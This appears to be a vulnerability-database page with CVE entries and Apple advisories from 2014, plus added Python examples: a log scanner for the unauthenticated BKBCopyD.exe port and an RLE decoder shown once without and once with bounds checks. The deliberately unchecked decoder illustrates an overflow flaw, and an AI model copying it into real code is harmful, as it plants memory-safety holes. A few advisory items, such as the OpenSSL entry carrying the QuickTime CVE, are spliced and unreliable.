| CVSS V2: 3.5 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in Schneider Electric StruxureWare SCADA Expert ClearSCADA 2010 R3 through 2014 R1 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. ClearSCADA is an integrated SCADA host platform that includes a real-time database, web server, alarm processor and reporting software. A cross-site scripting vulnerability in the ClearSCADA web interface allows an attacker to construct a malicious URI which, when opened by an authenticated user, runs attacker-supplied script in that user's session and can perform system management operations on the user's behalf. SCADA Expert ClearSCADA is prone to a cross-site scripting vulnerability. Schneider Electric StruxureWare SCADA Expert ClearSCADA is an energy-efficiency management and monitoring software platform from Schneider Electric of France. The platform is primarily used for remote management of critical infrastructure.
| VAR-201409-0501 | CVE-2014-4406 | Apple OS X Server CoreCollaboration Xcode Server cross-site scripting vulnerability |
| CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in Xcode Server in CoreCollaboration in Apple OS X Server before 3.2.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue is fixed in Mac OS X Server version 3.2.1. The software enables file sharing, meeting scheduling, website hosting, network remote access, and more.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-10-16-3 OS X Server v4.0
OS X Server v4.0 is now available and addresses the following:
BIND
Available for: OS X Yosemite v10.10 or later
Impact: Multiple vulnerabilities in BIND, the most serious of which
may lead to a denial of service
Description: Multiple vulnerabilities existed in BIND. These issues
were addressed by updating BIND to version 9.9.2-P2
CVE-ID
CVE-2013-3919
CVE-2013-4854
CVE-2014-0591
CoreCollaboration
Available for: OS X Yosemite v10.10 or later
Impact: A remote attacker may be able to execute arbitrary SQL
queries
Description: A SQL injection issue existed in Wiki Server. This
issue was addressed through additional validation of SQL queries.
CVE-ID
CVE-2014-4424 : Sajjad Pourali (sajjad@securation.com) of CERT of
Ferdowsi University of Mashhad
CoreCollaboration
Available for: OS X Yosemite v10.10 or later
Impact: Visiting a maliciously crafted website may lead to a cross-
site scripting attack
Description: A cross-site scripting issue existed in Xcode Server.
This issue was addressed through improved encoding of HTML output.
CVE-ID
CVE-2014-4406 : David Hoyt of Hoyt LLC
CoreCollaboration
Available for: OS X Yosemite v10.10 or later
Impact: Multiple vulnerabilities in PostgreSQL, the most serious of
which may lead to arbitrary code execution
Description: Multiple vulnerabilities existed in PostgreSQL. These
issues were addressed by updating PostgreSQL to version 9.2.7.
CVE-ID
CVE-2014-0060
CVE-2014-0061
CVE-2014-0062
CVE-2014-0063
CVE-2014-0064
CVE-2014-0065
CVE-2014-0066
Mail Service
Available for: OS X Yosemite v10.10 or later
Impact: Group SACL changes for Mail may not be respected until after
a restart of the Mail service
Description: SACL settings for Mail were cached and changes to the
SACLs were not respected until after a restart of the Mail service.
This issue was addressed by resetting the cache upon changes to the
SACLs.
CVE-ID
CVE-2014-4446 : Craig Courtney
Profile Manager
Available for: OS X Yosemite v10.10 or later
Impact: Multiple vulnerabilities in LibYAML, the most serious of
which may lead to arbitrary code execution
Description: Multiple vulnerabilities existed in LibYAML. These
issues were addressed by switching from YAML to JSON as Profile
Manager's internal serialization format.
CVE-ID
CVE-2013-4164
CVE-2013-6393
Profile Manager
Available for: OS X Yosemite v10.10 or later
Impact: A local user may obtain passwords after setting up or
editing profiles in Profile Manager
Description: In certain circumstances, setting up or editing
profiles in Profile Manager may have logged passwords to a file. This
issue was addressed through improved handling of credentials.
CVE-ID
CVE-2014-4447 : Mayo Jordanov
Server
Available for: OS X Yosemite v10.10 or later
Impact: An attacker may be able to decrypt data protected by SSL
Description: There are known attacks on the confidentiality of SSL
3.0 when a cipher suite uses a block cipher in CBC mode. An attacker
could force the use of SSL 3.0, even when the server would support a
better TLS version, by blocking TLS 1.0 and higher connection
attempts. This issue was addressed by disabling SSL 3.0 support in
Web Server, Calendar & Contacts Server, and Remote Administration.
CVE-ID
CVE-2014-3566 : Bodo Moeller, Thai Duong, and Krzysztof Kotowicz of
Google Security Team
ServerRuby
Available for: OS X Yosemite v10.10 or later
Impact: Running a Ruby script that handles untrusted YAML tags may
lead to an unexpected application termination or arbitrary code
execution
Description: An integer overflow issue existed in LibYAML's handling
of YAML tags. This issue was addressed through additional validation
of YAML tags.
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
=LbVb
-----END PGP SIGNATURE-----
| VAR-201412-0282 | CVE-2014-5208 | Yokogawa CENTUM and Exaopc arbitrary file access vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
BKBCopyD.exe in the Batch Management Packages in Yokogawa CENTUM CS 3000 through R3.09.50 and CENTUM VP through R4.03.00 and R5.x through R5.04.00, and Exaopc through R3.72.10, does not require authentication, which allows remote attackers to read arbitrary files via a RETR operation, write to arbitrary files via a STOR operation, or obtain sensitive database-location information via a PMODE operation, a different vulnerability than CVE-2014-0784. CENTUM and Exaopc, provided by Yokogawa Electric Corporation, have a flaw in the file handling of BKBCopyD.exe that allows access to arbitrary files. The National Vulnerability Database (NVD) classifies it as CWE-284: Improper Access Control (http://cwe.mitre.org/data/definitions/284.html). By sending a crafted communication frame to 20111/tcp, an attacker may read or create arbitrary files with the privileges of the user running the service. Yokogawa CENTUM CS 3000 is a production control system.
When Batch Management is installed on the affected CENTUM products, the BKBCopyD.exe service is started and listens on 20111/tcp. The service performs no authentication, so any attacker who can reach the port can read and write files. Multiple Yokogawa products are prone to this security weakness.
An attacker may leverage this issue to obtain potentially sensitive information and perform unauthorized actions in the context of the affected application. CENTUM CS and the other affected products are made by Yokogawa Electric (Japan); Exaopc is an OPC data access server. The vulnerability is caused by the program not requiring authentication. The following products and versions are affected: Yokogawa CENTUM CS 3000 R3.09.50 and earlier, CENTUM VP R4.03.00 and earlier, R5.x R5.04.00 and earlier, Exaopc R3.72.10 and earlier.
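Because BKBCopyD.exe accepts RETR, STOR and PMODE on 20111/tcp with no authentication at all, the only control left to the defender is who can reach that port. The script below is an added example, not Yokogawa's code: it runs over a constructed key=value connection log and flags every TCP connection to 20111 from a host that is not an approved Batch Management client, or that sits outside the control network. The log format, the allowlist and the control-network range are assumptions for the demonstration.

```python
"""Detection for exposure of the unauthenticated BKBCopyD.exe service (CVE-2014-5208).

Added example, not Yokogawa's code. The log lines are constructed in the
style of a key=value firewall connection log; adapt LINE_RE to your own
source. ALLOWED_CLIENTS and CONTROL_NET are assumptions for this demo.
"""
import ipaddress
import re
from collections import namedtuple

BKBCOPYD_PORT = 20111

# Engineering stations allowed to talk to BKBCopyD.exe (assumed).
ALLOWED_CLIENTS = {"10.20.1.10", "10.20.1.11"}
# The control network the service should only ever be reached from (assumed).
CONTROL_NET = ipaddress.ip_network("10.20.0.0/16")

Finding = namedtuple("Finding", "line src dst reason")

LINE_RE = re.compile(
    r"src=(?P<src>[\d.]+)\s+dst=(?P<dst>[\d.]+)\s+proto=(?P<proto>\w+)\s+dport=(?P<dport>\d+)"
)


def parse_line(line):
    """Return (src, dst, proto, dport) or None for lines that do not match."""
    m = LINE_RE.search(line)
    if not m:
        return None
    return m.group("src"), m.group("dst"), m.group("proto").lower(), int(m.group("dport"))


def classify(src, dst, proto, dport):
    """Return an alert reason for a BKBCopyD.exe connection, else None."""
    if proto != "tcp" or dport != BKBCOPYD_PORT:
        return None
    if ipaddress.ip_address(src) not in CONTROL_NET:
        return "connection to BKBCopyD.exe from outside the control network"
    if src not in ALLOWED_CLIENTS:
        return "connection to BKBCopyD.exe from a host not approved for Batch Management"
    return None


def scan(lines):
    """Run classify() over every parsable line and collect the findings."""
    findings = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        src, dst, proto, dport = parsed
        reason = classify(src, dst, proto, dport)
        if reason:
            findings.append(Finding(line, src, dst, reason))
    return findings


# Constructed sample log, not captured from a real system.
SAMPLE_LOG = [
    "2014-09-10T08:01:02 fw1 action=allow src=10.20.1.10 dst=10.20.5.2 proto=tcp dport=20111",
    "2014-09-10T08:01:05 fw1 action=allow src=10.20.1.77 dst=10.20.5.2 proto=tcp dport=20111",
    "2014-09-10T08:01:09 fw1 action=allow src=192.0.2.45 dst=10.20.5.2 proto=tcp dport=20111",
    "2014-09-10T08:01:11 fw1 action=allow src=192.0.2.45 dst=10.20.5.2 proto=tcp dport=443",
    "2014-09-10T08:01:12 fw1 action=allow src=10.20.1.10 dst=10.20.5.2 proto=udp dport=20111",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.src} -> {f.dst}:{BKBCOPYD_PORT}  {f.reason}")
```

Only the second and third sample lines produce findings: the first comes from an approved station, the fourth is a different port and the fifth is UDP. A hit from outside CONTROL_NET means the port is reachable from where it should not be at all, which is the case to escalate first.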
| VAR-201410-0363 | CVE-2014-7140 | Citrix NetScaler Application Delivery Controller and NetScaler Gateway Arbitrary code execution vulnerability in the management interface |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in the management interface in Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway 10.x before 10.1-129.11 and 10.5 before 10.5-50.10 allows remote attackers to execute arbitrary code via unknown vectors. Successful exploits will compromise the application and possibly the underlying device
| VAR-201409-0533 | CVE-2014-1391 | Apple OS X QT Media Foundation arbitrary code execution vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
QT Media Foundation in Apple OS X before 10.9.5 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted movie file with RLE encoding. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of RLE encoded data in the mdat atom. An attacker can use this flaw to write outside the allocated buffer, which could allow for the execution of arbitrary code in the context of the current process. Apple Mac OS X is prone to a memory-corruption vulnerability because it fails to perform adequate bounds checks on user-supplied input.
Successful exploits may allow attackers to execute arbitrary code in the context of the currently logged-in user; failed exploit attempts will cause denial-of-service conditions. Apple OS X is the operating system developed by Apple for Mac computers. The vulnerability exists in QT Media Foundation in versions of Apple OS X prior to 10.9.5.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-09-17-3 OS X Mavericks 10.9.5 and Security Update
2014-004
OS X Mavericks 10.9.5 and Security Update 2014-004 are now available
and address the following:
apache_mod_php
Available for: OS X Mavericks 10.9 to 10.9.4
Impact: Multiple vulnerabilities in PHP 5.4.24
Description: Multiple vulnerabilities existed in PHP 5.4.24, the
most serious of which may have led to arbitrary code execution. This
update addresses the issues by updating PHP to version 5.4.30.
CVE-ID
CVE-2013-7345
CVE-2014-0185
CVE-2014-0207
CVE-2014-0237
CVE-2014-0238
CVE-2014-1943
CVE-2014-2270
CVE-2014-3478
CVE-2014-3479
CVE-2014-3480
CVE-2014-3487
CVE-2014-3515
CVE-2014-3981
CVE-2014-4049
Bluetooth
Available for: OS X Mavericks 10.9 to 10.9.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A validation issue existed in the handling of a
Bluetooth API call. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-4390 : Ian Beer of Google Project Zero
CoreGraphics
Available for: OS X Mavericks 10.9 to 10.9.4
Impact: Opening a maliciously crafted PDF file may lead to an
unexpected application termination or an information disclosure
Description: An out of bounds memory read existed in the handling of
PDF files. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4378 : Felipe Andres Manzano of Binamuse VRT working with
the iSIGHT Partners GVP Program
CoreGraphics
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 to 10.9.4
Impact: Opening a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: An integer overflow existed in the handling of PDF
files. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4377 : Felipe Andres Manzano of Binamuse VRT working with
the iSIGHT Partners GVP Program
Foundation
Available for: OS X Mavericks 10.9 to 10.9.4
Impact: An application using NSXMLParser may be misused to disclose
information
Description: An XML External Entity issue existed in NSXMLParser's
handling of XML. This issue was addressed by not loading external
entities across origins.
CVE-ID
CVE-2014-4374 : George Gal of VSR (http://www.vsecurity.com/)
Intel Graphics Driver
Available for: OS X Mountain Lion v10.8.5,
OS X Mavericks 10.9 to 10.9.4
Impact: Compiling untrusted GLSL shaders may lead to an unexpected
application termination or arbitrary code execution
Description: A user-space buffer overflow existed in the shader
compiler. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4393 : Apple
Intel Graphics Driver
Available for: OS X Mountain Lion v10.8.5,
OS X Mavericks 10.9 to 10.9.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: Multiple validation issues existed in some integrated
graphics driver routines. These issues were addressed through
improved bounds checking.
CVE-ID
CVE-2014-4394 : Ian Beer of Google Project Zero
CVE-2014-4395 : Ian Beer of Google Project Zero
CVE-2014-4396 : Ian Beer of Google Project Zero
CVE-2014-4397 : Ian Beer of Google Project Zero
CVE-2014-4398 : Ian Beer of Google Project Zero
CVE-2014-4399 : Ian Beer of Google Project Zero
CVE-2014-4400 : Ian Beer of Google Project Zero
CVE-2014-4401 : Ian Beer of Google Project Zero
CVE-2014-4416 : Ian Beer of Google Project Zero
IOAcceleratorFamily
Available for: OS X Mountain Lion v10.8.5,
OS X Mavericks 10.9 to 10.9.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A null pointer dereference existed in the handling of
IOKit API arguments. This issue was addressed through improved
validation of IOKit API arguments.
CVE-ID
CVE-2014-4376 : Ian Beer of Google Project Zero
IOAcceleratorFamily
Available for: OS X Mavericks 10.9 to 10.9.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: An out-of-bounds read issue existed in the handling of
an IOAcceleratorFamily function. This issue was addressed through
improved bounds checking.
CVE-ID
CVE-2014-4402 : Ian Beer of Google Project Zero
IOHIDFamily
Available for: OS X Mountain Lion v10.8.5,
OS X Mavericks 10.9 to 10.9.4
Impact: A local user can read kernel pointers, which can be used to
bypass kernel address space layout randomization
Description: An out-of-bounds read issue existed in the handling of
an IOHIDFamily function. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-4379 : Ian Beer of Google Project Zero
IOKit
Available for: OS X Mountain Lion v10.8.5,
OS X Mavericks 10.9 to 10.9.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A validation issue existed in the handling of certain
metadata fields of IODataQueue objects. This issue was addressed
through improved validation of metadata.
CVE-ID
CVE-2014-4388 : @PanguTeam
IOKit
Available for: OS X Mountain Lion v10.8.5,
OS X Mavericks 10.9 to 10.9.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: An integer overflow existed in the handling of IOKit
functions. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4389 : Ian Beer of Google Project Zero
Kernel
Available for: OS X Mavericks 10.9 to 10.9.4
Impact: A local user can infer kernel addresses and bypass kernel
address space layout randomization
Description: In some cases, the CPU Global Descriptor Table was
allocated at a predictable address. This issue was addressed through
always allocating the Global Descriptor Table at random addresses.
CVE-ID
CVE-2014-4403 : Ian Beer of Google Project Zero
Libnotify
Available for: OS X Mountain Lion v10.8.5,
OS X Mavericks 10.9 to 10.9.4
Impact: A malicious application may be able to execute arbitrary
code with root privileges
Description: An out-of-bounds write issue existed in Libnotify. This
issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4381 : Ian Beer of Google Project Zero
OpenSSL
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 to 10.9.4
Impact: Multiple vulnerabilities in OpenSSL 0.9.8y, including one
that may lead to arbitrary code execution
Description: Multiple vulnerabilities existed in OpenSSL 0.9.8y.
These issues were addressed by updating OpenSSL to version 0.9.8za. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-1391 : Fernando Munoz working with iDefense VCP, Tom
Gallagher & Paul Bates working with HP's Zero Day Initiative
QT Media Foundation
Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,
OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 to 10.9.4
Impact: Playing a maliciously crafted MIDI file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of MIDI
files. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4979 : Andrea Micalizzi aka rgod working with HP's Zero Day
Initiative
ruby
Available for: OS X Mavericks 10.9 to 10.9.4
Impact: A remote attacker may be able to cause arbitrary code
execution
Description: A heap buffer overflow existed in LibYAML's handling of
percent-encoded characters in a URI. This issue was addressed through
improved bounds checking. This update addresses the issues by
updating LibYAML to version 0.1.6.
CVE-ID
CVE-2014-2525
Note: OS X Mavericks 10.9.5 includes the security content of
Safari 7.0.6: http://support.apple.com/kb/HT6367
OS X Mavericks v10.9.5 and Security Update 2014-004 may be obtained
from the Mac App Store or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
=gpVc
-----END PGP SIGNATURE-----
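The flaw class behind CVE-2014-1391 is a run length taken from the file driving a write past the end of the decoder's output buffer. The following is an added Python example, not Apple's code and not the actual QuickTime RLE layout (which this page does not describe): a generic PackBits-style run-length decoder, once trusting the run lengths and once checking every run against the space left in a frame of declared size before writing. The byte layout and the sample frames are constructed for the demonstration.

```python
"""Run-length decoding with and without an output bounds check.

Added example (not Apple's code). The byte layout is a generic
PackBits-style scheme chosen for illustration, not QuickTime's RLE codec:
  control byte c, 0 <= c < 128  : copy the next c+1 literal bytes
  control byte c, 128 < c <= 255: repeat the next byte (257 - c) times
  control byte 128              : no-op
The declared frame size plays the role of the allocated output buffer.
"""


class RleError(ValueError):
    """Raised by the checked decoder for any run that would leave the buffers."""


def decode_rle_unchecked(data, declared_size):
    """Trusts the run lengths in `data`; the output may exceed declared_size.

    In a C decoder writing into a buffer of declared_size bytes, every byte
    produced beyond that size would be an out-of-bounds write.
    """
    out = bytearray()
    i = 0
    while i < len(data):
        c = data[i]
        i += 1
        if c < 128:
            n = c + 1
            out += data[i:i + n]
            i += n
        elif c > 128:
            n = 257 - c
            out += bytes([data[i]]) * n
            i += 1
    return bytes(out)


def decode_rle_checked(data, declared_size):
    """Same format, but refuses any run that would write past declared_size
    or read past the end of the input, before touching the buffer."""
    out = bytearray(declared_size)
    pos = 0
    i = 0
    while i < len(data):
        c = data[i]
        i += 1
        if c == 128:
            continue
        if c < 128:
            n = c + 1
            if i + n > len(data):
                raise RleError("literal run reads past end of input")
            if pos + n > declared_size:
                raise RleError("literal run writes past end of output")
            out[pos:pos + n] = data[i:i + n]
            i += n
        else:
            n = 257 - c
            if i >= len(data):
                raise RleError("repeat run reads past end of input")
            if pos + n > declared_size:
                raise RleError("repeat run writes past end of output")
            out[pos:pos + n] = bytes([data[i]]) * n
            i += 1
        pos += n
    if pos != declared_size:
        raise RleError("frame shorter than declared size")
    return bytes(out)


def is_rejected(data, declared_size):
    """True if the checked decoder refuses the frame."""
    try:
        decode_rle_checked(data, declared_size)
    except RleError:
        return True
    return False


# Constructed inputs, not taken from a real movie file.
GOOD_FRAME = bytes([0x02, 0x41, 0x42, 0x43, 0xFE, 0x44])  # "ABC" then 'D' x3, 6 bytes
BAD_FRAME = bytes([0x02, 0x41, 0x42, 0x43, 0x81, 0x44])   # "ABC" then 'D' x128 into a 6-byte frame

if __name__ == "__main__":
    print(decode_rle_checked(GOOD_FRAME, 6))
    print(len(decode_rle_unchecked(BAD_FRAME, 6)), "bytes from a frame declared as 6")
    print("checked decoder rejects BAD_FRAME:", is_rejected(BAD_FRAME, 6))
```

The unchecked decoder turns the 6-byte frame into 131 bytes, which is exactly the overrun a fixed-size C buffer would suffer; the checked decoder raises on the repeat run before writing anything. Note that the check must happen per run and before the copy: verifying only the total at the end is too late.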
| VAR-201409-0519 | CVE-2014-4383 | Apple iOS and Apple TV Assets subsystem update-status spoofing vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
The Assets subsystem in Apple iOS before 8 and Apple TV before 7 allows man-in-the-middle attackers to spoof a device's update status via a crafted Last-Modified HTTP response header. Apple iOS and TV are prone to multiple security vulnerabilities. These issues affect the following components:
802.1X, Accounts, Accessibility, Accounts Framework, Address Book, App Installation, Assets, Bluetooth, CoreGraphics, Foundation, Home & Lock Screen, iMessage, IOAcceleratorFamily, IOHIDFamily, IOKit, Kernel, Libnotify, Mail, Profiles, Safari, Sandbox Profiles, syslog and WebKit components.
Successfully exploiting these issues may allow attackers to crash the affected device, bypass security restrictions, obtain sensitive information, or execute arbitrary code. Other attacks are also possible.
This BID is being retired. The following individual records exist to better document the issues:
69913 Apple iOS and TV CVE-2014-4364 Spoofing Vulnerability
69917 Apple iOS CVE-2014-4423 Information Disclosure Vulnerability
69926 Apple iOS Lock Screen CVE-2014-4368 Security Bypass Vulnerability
69930 Apple iOS and TV CVE-2014-4357 Local Information Disclosure Security Vulnerability
69932 Apple iOS CVE-2014-4352 Local Information Disclosure Security Vulnerability
69936 Apple iOS CVE-2014-4386 Local Privilege Escalation Vulnerability
69940 Apple iOS CVE-2014-4384 Local Privilege Escalation Vulnerability
69941 Apple iOS and TV CVE-2014-4383 Security Bypass Vulnerability
69943 Apple iOS CVE-2014-4354 Unspecified Security Vulnerability
69903 Multiple Apple Products CVE-2014-4377 PDF Handling Integer Overflow Vulnerability
69915 Apple TV/Mac OS X/iOS CVE-2014-4378 Out of Bounds Read Memory Corruption Vulnerability
69905 Apple Mac OS X and iOS CVE-2014-4374 XML External Entity Information Disclosure Vulnerability
69921 Apple TV/Mac OS X/iOS CVE-2014-4379 Out of Bounds Read Memory Corruption Vulnerability
69929 Apple TV and iOS CVE-2014-4369 NULL Pointer Dereference Denial of Service Vulnerability
69934 Apple TV and iOS CVE-2014-4373 NULL Pointer Dereference Denial of Service Vulnerability
69938 Apple TV and iOS CVE-2014-4405 NULL Pointer Dereference Remote Code Execution Vulnerability
69942 Apple TV and iOS CVE-2014-4380 Out of Bounds Read Write Remote Code Execution Vulnerability
69947 Apple TV and iOS CVE-2014-4404 Heap Based Buffer Overflow Vulnerability
69949 Apple iOS CVE-2014-4361 Security Bypass Vulnerability
69951 Apple iOS CVE-2014-4353 Race Condition Local Information Disclosure Vulnerability
69912 Apple iOS and TV CVE-2014-4407 Information Disclosure Security Vulnerability
69919 Apple iOS and TV CVE-2014-4371 Unspecified Security Vulnerability
69924 Apple iOS and TV CVE-2014-4421 Unspecified Security Vulnerability
69927 Apple iOS and TV CVE-2014-4420 Unspecified Security Vulnerability
69928 Apple iOS and TV CVE-2014-4419 Unspecified Security Vulnerability
69939 Apple iOS and TV CVE-2014-4408 Out of Bounds Read Local Memory Corruption Vulnerability
69944 Apple iOS and TV CVE-2014-4375 Local Memory Corruption Vulnerability
69946 Apple iOS and TV CVE-2014-4418 Remote Code Execution Vulnerability
69948 Apple TV/Mac OS X/iOS CVE-2014-4388 Remote Code Execution Vulnerability
69950 Apple TV/Mac OS X/iOS CVE-2014-4389 Integer Buffer Overflow Vulnerability
69937 WebKit Private Browsing CVE-2014-4409 Security Bypass Vulnerability
69911 Apple iOS and TV CVE-2014-4422 Security Bypass Vulnerability
69931 Apple TV/Mac OS X/iOS CVE-2014-4381 Arbitrary Code Execution Vulnerability
69914 Apple iOS CVE-2014-4366 Information Disclosure Vulnerability
69945 Apple iOS CVE-2014-4367 Security Vulnerability
69920 Apple iOS CVE-2014-4362 Information Disclosure Vulnerability
69922 Apple iOS CVE-2014-4356 Local Information Disclosure Vulnerability
69923 Apple iOS and TV CVE-2014-4372 Local Security Bypass Vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-09-17-2 Apple TV 7
Apple TV 7 is now available and addresses the following:
Apple TV
Available for: Apple TV 3rd generation and later
Impact: An attacker can obtain WiFi credentials
Description: An attacker could have impersonated a WiFi access
point, offered to authenticate with LEAP, broken the MS-CHAPv1 hash,
and used the derived credentials to authenticate to the intended
access point even if that access point supported stronger
authentication methods. This issue was addressed by removing support
for LEAP.
CVE-ID
CVE-2014-4364 : Pieter Robyns, Bram Bonne, Peter Quax, and Wim
Lamotte of Universiteit Hasselt
Apple TV
Available for: Apple TV 3rd generation and later
Impact: An attacker with access to a device may access sensitive
user information from logs
Description: Sensitive user information was logged. This issue was
addressed by logging less information.
CVE-ID
CVE-2014-4357 : Heli Myllykoski of OP-Pohjola Group
Apple TV
Available for: Apple TV 3rd generation and later
Impact: An attacker with a privileged network position may be able
to cause a device to think that it is up to date even when it is not
Description: A validation issue existed in the handling of update
check responses. Spoofed dates from Last-Modified response headers
set to future dates were used for If-Modified-Since checks in
subsequent update requests. This issue was addressed by validation of
the Last-Modified header.
CVE-ID
CVE-2014-4383 : Raul Siles of DinoSec
Apple TV
Available for: Apple TV 3rd generation and later
Impact: Opening a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: An integer overflow existed in the handling of PDF
files. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4377 : Felipe Andres Manzano of Binamuse VRT working with
the iSIGHT Partners GVP Program
Apple TV
Available for: Apple TV 3rd generation and later
Impact: Opening a maliciously crafted PDF file may lead to an
unexpected application termination or an information disclosure
Description: An out of bounds memory read existed in the handling of
PDF files. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4378 : Felipe Andres Manzano of Binamuse VRT working with
the iSIGHT Partners GVP Program
Apple TV
Available for: Apple TV 3rd generation and later
Impact: An application may cause an unexpected system termination
Description: A null pointer dereference existed in the handling of
IOAcceleratorFamily API arguments. This issue was addressed through
improved validation of IOAcceleratorFamily API arguments.
CVE-ID
CVE-2014-4369 : Catherine aka winocm
Apple TV
Available for: Apple TV 3rd generation and later
Impact: The device may unexpectedly restart
Description: A NULL pointer dereference was present in the
IntelAccelerator driver. The issue was addressed by improved error
handling.
CVE-ID
CVE-2014-4373 : cunzhang from Adlab of Venustech
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to read kernel pointers,
which can be used to bypass kernel address space layout randomization
Description: An out-of-bounds read issue existed in the handling of
an IOHIDFamily function. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-4379 : Ian Beer of Google Project Zero
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A heap buffer overflow existed in IOHIDFamily's
handling of key-mapping properties. This issue was addressed through
improved bounds checking.
CVE-ID
CVE-2014-4404 : Ian Beer of Google Project Zero
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A null pointer dereference existed in IOHIDFamily's
handling of key-mapping properties. This issue was addressed through
improved validation of IOHIDFamily key-mapping properties.
CVE-ID
CVE-2014-4405 : Ian Beer of Google Project Zero
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to execute arbitrary
code with kernel privileges
Description: An out-of-bounds write issue existed in the IOHIDFamily
kernel extension. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-4380 : cunzhang from Adlab of Venustech
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to read uninitialized
data from kernel memory
Description: An uninitialized memory access issue existed in the
handling of IOKit functions. This issue was addressed through
improved memory initialization.
CVE-ID
CVE-2014-4407 : @PanguTeam
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A validation issue existed in the handling of certain
metadata fields of IODataQueue objects. This issue was addressed
through improved validation of metadata.
CVE-ID
CVE-2014-4418 : Ian Beer of Google Project Zero
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A validation issue existed in the handling of certain
metadata fields of IODataQueue objects. This issue was addressed
through improved validation of metadata.
CVE-ID
CVE-2014-4388 : @PanguTeam
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: An integer overflow existed in the handling of IOKit
functions. This issue was addressed through improved validation of
IOKit API arguments.
CVE-ID
CVE-2014-4389 : Ian Beer of Google Project Zero
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A local user may be able to determine kernel memory layout
Description: Multiple uninitialized memory issues existed in the
network statistics interface, which led to the disclosure of kernel
memory content. This issue was addressed through additional memory
initialization.
CVE-ID
CVE-2014-4371 : Fermin J. Serna of the Google Security Team
CVE-2014-4419 : Fermin J. Serna of the Google Security Team
CVE-2014-4420 : Fermin J. Serna of the Google Security Team
CVE-2014-4421 : Fermin J. Serna of the Google Security Team
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A person with a privileged network position may cause a
denial of service
Description: A race condition issue existed in the handling of IPv6
packets. This issue was addressed through improved lock state
checking.
CVE-ID
CVE-2011-2391 : Marc Heuse
Apple TV
Available for: Apple TV 3rd generation and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: A double free issue existed in the handling of Mach
ports. This issue was addressed through improved validation of Mach
ports.
CVE-ID
CVE-2014-4375
Apple TV
